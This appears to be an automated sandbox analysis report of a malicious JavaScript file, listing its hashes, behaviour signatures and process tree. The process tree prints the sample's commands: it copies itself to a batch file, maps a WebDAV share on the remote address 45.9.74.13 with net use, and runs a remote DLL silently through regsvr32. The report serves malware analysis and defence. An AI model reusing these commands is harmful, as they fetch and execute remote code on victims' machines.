Analysis
- max time kernel: 10s
- max time network: 16s
- platform: windows7_x64
- resource: win7-20240704-en
- resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
- submitted: 09/07/2024, 08:19
Static task: static1

Behavioral task: behavioral1
- Sample: 28034278092616319677.js
- Resource: win7-20240704-en

Behavioral task: behavioral2
- Sample: 28034278092616319677.js
- Resource: win10v2004-20240704-en
General
- Target: 28034278092616319677.js
- Size: 14KB
- MD5: 1234aebaf9d395b177bfa95b56c61dc2
- SHA1: b8458ddbfec3baf6433537a68ed36076daace166
- SHA256: df085d537d229075c1fbda32e736671566e856ccb2258b06d4666c315d980e91
- SHA512: dfdd614329a595df31a3a5a61ab14fd8a425f55f6c6696aa30173b5727a65ee06f586ed65ad6709aba339876082be334930a619b6c77d102c03d096eccedbcd9
- SSDEEP: 384:F7iiDcO+vvck10SOuTVgb/NdVQzRNs83YY83Ye:8Ac/cvF7dqe
Malware Config
Signatures
- Command and Scripting Interpreter: JavaScript (1 TTP)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Runs net.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid   Process
  3052  regsvr32.exe
- Suspicious use of WriteProcessMemory (11 IoCs)
  description                         pid   Process       procid_target
  PID 2124 wrote to memory of 2904    2124  wscript.exe   29
  PID 2124 wrote to memory of 2904    2124  wscript.exe   29
  PID 2124 wrote to memory of 2904    2124  wscript.exe   29
  PID 2904 wrote to memory of 2704    2904  cmd.exe       31
  PID 2904 wrote to memory of 2704    2904  cmd.exe       31
  PID 2904 wrote to memory of 2704    2904  cmd.exe       31
  PID 2904 wrote to memory of 3052    2904  cmd.exe       32
  PID 2904 wrote to memory of 3052    2904  cmd.exe       32
  PID 2904 wrote to memory of 3052    2904  cmd.exe       32
  PID 2904 wrote to memory of 3052    2904  cmd.exe       32
  PID 2904 wrote to memory of 3052    2904  cmd.exe       32
Processes
- [1] C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\28034278092616319677.js
  PID: 2124
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\28034278092616319677.js" "C:\Users\Admin\AppData\Local\Temp\\prepareringwooden.bat" && "C:\Users\Admin\AppData\Local\Temp\\prepareringwooden.bat"
    PID: 2904
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net.exe
      Command line: net use \\45.9.74.13@8888\DavWWWRoot\
      PID: 2704
    - [3] C:\Windows\system32\regsvr32.exe
      Command line: regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\17.dll
      PID: 3052
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 14KB
- MD5: 1234aebaf9d395b177bfa95b56c61dc2
- SHA1: b8458ddbfec3baf6433537a68ed36076daace166
- SHA256: df085d537d229075c1fbda32e736671566e856ccb2258b06d4666c315d980e91
- SHA512: dfdd614329a595df31a3a5a61ab14fd8a425f55f6c6696aa30173b5727a65ee06f586ed65ad6709aba339876082be334930a619b6c77d102c03d096eccedbcd9